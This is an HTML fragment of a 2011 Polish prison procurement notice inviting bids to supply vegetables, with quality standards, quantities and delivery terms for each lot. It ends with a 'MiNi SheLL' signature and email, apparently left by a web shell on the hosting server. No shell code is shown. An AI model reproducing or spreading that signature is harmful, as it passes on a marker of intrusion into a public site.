<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakładk Karny, ul. eichendorffa 14, 47-400 Racibórz Dział Kwatermistrzowski.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.01.2011 godzina 09:30, miejsce: sekretariat Zakładu Karnego w Raciborzu.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> grupa I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Botwina
(burak liściowy)

Zgodnie z PN-R-75384:1997
Zamawiający wymaga aby dostarczane produkty  były:
-  całe
-  zdrowe, 
-  czyste, o świeżym wyglądzie
-  praktycznie wolne od szkodników oraz uszkodzeń spowodowanych przez szkodniki,
-  wolne od nadmiernego zawilgocenia powierzchniowego,
-  wolne od jakichkolwiek obcych zapachów lub smaków,
-  wystarczająco rozwinięte i odpowiednio dojrzałe,
nie powinny być zwiędniętae nadpleśniałe, nagdnite;
bez żółtych, czy zdrewniałych liści, pakowana wg standardu
dostawa:średnio co 2 tygodnie
ilośc [kg]
400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> grupa II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pomidory Zgodne z :PN-91R-75368, ROZPORZĄDZENIE KOMISJI (WE) NR 7712009
Zamawiający wymaga aby dostarczane produkty  były:
-          całe;
-          zdrowe; nie dopuszcza się pomidorów z objawami gnicia lub z takimi zmianami, które czynią je niezdatnymi do spożycia;
-          czyste, praktycznie wolne od jakichkolwiek widocznych zanieczyszczeń obcych;
-          o świeżym wyglądzie;
-          praktycznie wolne od szkodników;
-          praktycznie wolne od uszkodzeń spowodowanych przez szkodniki;
-          wolne od nadmiernego zawilgocenia powierzchniowego; 
-          bez obcych zapachów ilub smaków.

Stopień rozwoju i stan pomidorów powinny być takie, aby mogły:
-     wytrzymać transport i manipulacje, oraz
-     dotrzeć do miejsca przeznaczenia zachowując zadowalającą jakość.
Klasa I - Pomidory w tej klasie powinny być dobrej jakości, wystarczająco jędrne i mieć cechy charakterystyczne dla danej odmiany. Nie dopuszcza się pęknięć i widocznych zielonych piętek
Dopuszcza się następujące niewielkie wady, pod warunkiem, że nie wpływają one ujemnie na ogólny wygląd pomidorów, ich trwałość i wygląd w opakowaniu:
-          niewielkie wady kształtu lub rozwoju,
-          niewielkie wady barwy,
-          niewielkie wady skórki,
-          bardzo niewielkie odgniecenia.
Ponadto pomidory żebrowane mogą mieć:
-          zabliźnione pęknięcia o długości nie większej niż 1 cm,
-          niewielkie wypukłości,
-          małą nieskorkowaciałą narośl,
-          skorkowacenie blizny słupkowej nie przekraczające 1cm2,
-          delikatne zabliźnienie słupkowe o kształcie wydłużonym, robiące wrażenie szwu, którego długość nie może być większa niż 2 3 największej średnicy pomidora.
Dla pomidorów minimalną średnicę ustala się: - 35 mm dla pomidorów  okrągłych i żebrowanych, - 30 mm dla pomidorów podłużnych. Przedziały wielkości  - 30 mm i powyżej, lecz poniżej 35 mm (podłużne), - 35 mm i powyżej, lecz poniżej 40 mm, - 40 mm i powyżej, lecz poniżej 47 mm, - 47 mm i powyżej, lecz poniżej 57 mm, - 57 mm i powyżej, lecz poniżej 67 mm, - 67 mm i powyżej, lecz poniżej 82 mm, - 82 mm i powyżej, lecz poniżej 102 mm, - 102 mm i powyżej.
Tolerancja odnośnie jakości:
10 % liczbowo lub masowo pomidorów nie spełniających wymagań klasy I, lecz zgodnych z wymaganiami dla klasy II. W ramach tej tolerancji nie więcej niż 1 % pomidorów może nie spełniać wymagań klasy II lub wymagań minimalnych. Nie dopuszcza się pomidorów z objawami gnicia lub z takimi zmianami, które czynią je niezdatnymi do spożycia. W przypadku pomidorów gałązkowych 5 % liczbowo lub masowo pomidorów oderwanych od gałązki.
Tolerancje odnośnie wielkości:Dla wszystkich klas jakości dopuszcza się: 10 % liczbowo lub masowo pomidorów odpowiadających  wielkości bezpośrednio większej lub mniejszej od deklarowanej.  Sposób pakowania powinien być taki, aby należycie chronił pomidory przed uszkodzeniem. 
Materiały stosowane do wykładania wnętrza opakowania powinny być nowe, czyste i takiej jakości, aby zapobiegały jakimkolwiek uszkodzeniom zewnętrznym lub wewnętrznym produktu. Użycie materiałów, zwłaszcza papieru ze specyfikacją handlową jest dozwolone pod warunkiem, że nadruk lub etykieta zostaną wykonane nietoksycznym tuszem lub klejem.
Opakowania nie powinny zawierać żadnych zanieczyszczeń obcych.
Na każdym opakowaniu należy umieścić następujące informacje, zgrupowane na tej samej stronie, naniesione w sposób czytelny, trwały oraz widoczny z zewnątrz.
A.         Identyfikacja
Pakujący ilub wysyłający.
- nazwa i adres (np. ulica, miasto, region, kod pocztowy i państwo jeśli jest różne od kraju pochodzenia)
lub oznaczenie kodowe oficjalnie uznane przez organ krajowy
B.         Nazwa produktu Pomidory
C.         Pochodzenie produktuKraj pochodzenia
Dostawa: 2 razy w tygodniu:
od 10-06-20010 do 30-09 -20010 w ilościach 100-200 kg(na tydzień)
do 09-06-2010 oraz od  01-10-2010 do 20-12-2010 w ilościach ok 10-20kg(na tydzień)
w okresie Świąt Wielkanocnych oraz Bożego Narodzenia - ok 300 kg

Pomidory powinny być jednolite, tj. tego samego pochodzenia, tej samej odmiany lub typu handlowego, tej samej jakości i wielkości
 ilośc[kg] 3000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.12.40-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> grupa III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kalarepa
 Zgodne z PN-R-75376:1996
Zamawiający wymaga aby dostarczane produkty  były:
-  całe
-  zdrowe, 
-  czyste, 
-  praktycznie wolne od szkodników oraz uszkodzeń spowodowanych przez szkodniki,
-  wolne od nadmiernego zawilgocenia powierzchniowego,
-  wolne od jakichkolwiek obcych zapachów lub smaków,
-  wystarczająco rozwinięte i odpowiednio dojrzałe,
nie powinny być zaparzone, nadgniłe, łykowate;
pakowana: w skrzynki lub luzem
dostawa: ok. 2 razy w tygodniu w ilościach od 50 - 150 kg
ilość[kg]3000 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> grupa IV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rabarbar
godne  z PN-72 R-75361 200
Zamawiający wymaga aby dostarczane produkty  były:
-  całe
-  zdrowe, 
-  czyste, 
-  praktycznie wolne od szkodników oraz uszkodzeń spowodowanych przez szkodniki,
-  wolne od nadmiernego zawilgocenia powierzchniowego,
-  wolne od jakichkolwiek obcych zapachów lub smaków,
-  wystarczająco rozwinięte i odpowiednio dojrzałe,
nie powinnny być zaparzone, nadgniłe, łykowate; pakowany: w skrzynki lub luzem
dostawa:  2 razy w tygodniu w ilościach od 50 - 150 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.09.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> grupa V.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Brukselka (kapusta brukselska)zgodnie z zał.  do rozporządzenia Komisji (EWG) nr 159187 z dnia 5 czerwca 1987 r. Oraz zmianami wprowadzonymi  rozporządzeniami Komisji (WE) nr 88897 oraz Nr 462003. Norma EKGONZ FFV-08
  wymagań jakościowych w odniesieniu do kapusty brukselskiej po jej przygotowaniu i opakowaniu.
A. Wymagania minimalne
We wszystkich klasach, z zastrzeżeniem szczególnych przepisów dla każdej klasy i przyznanych tolerancji, kapusta brukselska musi być:
- w stanie nienaruszonym,
- zdrowa, wyklucza się produkt z objawami gnicia lub pogorszenia, które powoduje jej nieprzydatność do spożycia,
- o świeżym wyglądzie,
- czysta, praktycznie pozbawiona jakichkolwiek widocznych substancji obcych,
- niezmrożona,
- wolna od owadów i/lub innych pasożytów,
- pozbawiona nadmiernego zawilgocenia zewnętrznego,
- wolna od wszelkich obcych zapachów ilub smaków.
Szypułka odciętej kapusty brukselskiej musi być obcięta tuż poniżej liści zewnętrznych. W kapuście brukselskiej nieodciętej szypułka musi być złamana u nasady; miejsce cięcia lub złamania musi być czyste, bez  przylegających innych części rośliny.
Stan kapusty brukselskiej musi być taki, aby mogła ona:
- wytrzymać transport i przeładunek, oraz
- dotrzeć do miejsca przeznaczenia w zadowalającym stanie.
Klasa I
Kapusta brukselska w tej klasie powinna być dobrej jakości oraz musi być:
- zwarta,
- zamknięta,
- pozbawiona uszkodzeń spowodowanych mrozem.
Odcięta kapusta brukselska musi mieć odpowiednią barwę. W odniesieniu do nieodciętej kapusty brukselskiej dopuszcza się lekkie odbarwienie liści u nasady oraz lekkie uszkodzenie liści zewnętrznych spowodowane odrywaniem, sortowaniem lub pakowaniem, pod warunkiem, że nie wpływają one na stan produktu.
 
Wielkość określa się na podstawie największej średnicy przekroju poprzecznego.
Minimalna średnica przekroju wynosi:
- 10 mm dla kapusty brukselskiej odciętej klasy I oraz
W każdym opakowaniu kapusty brukselskiej klasy I dopuszczalna różnica między największą a najmniejszą główką nie może przekraczać 20 mm.
 
W każdym opakowaniu dopuszcza się tolerancje w odniesieniu do jakości i wielkości produktu, który nie spełnia wymagań określonych dla danej klasy.
A. Tolerancje dotyczące ilości
i) Klasa I
10 % według wagi kapusty brukselskiej niespełniającej wymagań dla klasy, lecz zgodnych z wymaganiami dla klasy II lub wyjątkowo mieszczących się w granicach tolerancji ustalonych dla tej klasy.
B. Tolerancje dotyczące wielkości
Dla wszystkich klas: 10 % wagi kapusty brukselskiej niespełniającej wymagań w zakresie wielkości.
 
Zawartość każdego opakowania musi być jednolita oraz musi obejmować kapustę brukselską tego samego pochodzenia, odmiany, jakości i wielkości. Widoczna część zawartości każdego opakowania musi być
reprezentatywna dla całej zawartości.

B. Opakowanie
Opakowanie musi zapewniać właściwą ochronę kapusty brukselskiej. Materiały stosowane wewnątrz opakowania muszą być nowe, czyste i takiej jakości, aby zapobiegały jakimkolwiek uszkodzeniom
zewnętrznym lub wewnętrznym produktu. Stosowanie materiałów, w szczególności papierowych lub pieczęci ze specyfikacją handlową jest dozwolone pod warunkiem, że nadruk i etykieta wykonane są nietoksycznym tuszem lub klejem. Opakowania nie mogą zawierać żadnych obcych substancji.
Naklejki umieszczane indywidualnie na produktach nie mogą, po usunięciu, pozostawiać widocznych śladów kleju ani prowadzić do uszkodzeń skórki.
 
Na każdym opakowaniu należy umieścić następujące informacje, zgrupowane po tej samej stronie, naniesione w sposób czytelny i trwały oraz widoczne z zewnątrz:
Nazwa i adres podmiotu pakującego ilub wysyłającego
Wzmiankę tę można zastąpić:
- dla wszystkich opakowań z wyjątkiem opakowań indywidualnych, oficjalnie wydanym lub zaaprobowanym oznaczeniem kodu określającego podmiot pakujący ilub wysyłający, umieszczonym w bliskim sąsiedztwie określenia Podmiot pakujący ilub wysyłający(lub odpowiednich skrótów);
B. Rodzaj produktu
Kapusta brukselska odcięta lub Kapusta brukselska nieodcięta, jeśli zawartość opakowania nie jest widoczna z zewnątrz.
C. Pochodzenie produktu
Kraj pochodzenia i, nieobowiązkowo, region uprawy lub krajowa, regionalna albo lokalna nazwa miejsca.
D. Specyfikacje handlowe
Klasa; w przypadku sortowania według wielkości, wielkość wyrażona jako średnica minimalna i maksymalna.
Dostawa: 2 razy w tygodniu w ilościach od 50 - 150 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.14.40-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com